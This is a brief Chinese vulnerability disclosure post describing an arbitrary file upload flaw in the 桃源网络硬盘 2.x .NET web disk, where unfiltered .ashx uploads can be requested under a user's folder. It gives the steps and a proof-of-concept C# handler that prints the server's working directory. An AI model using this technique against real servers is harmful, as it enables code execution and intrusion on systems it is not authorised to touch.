桃源网络硬盘2.x for .NET版本任意文件上传漏洞

没有过滤ashx 上传1.ashx文件 访问目录 http://0day5.com/myfile/用户名/1.ashx test code: [php] <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; context.Response.Write("path:"+Environment.CurrentDirectory); } public bool IsReusable { get { return false; } } }[/php]

发表评论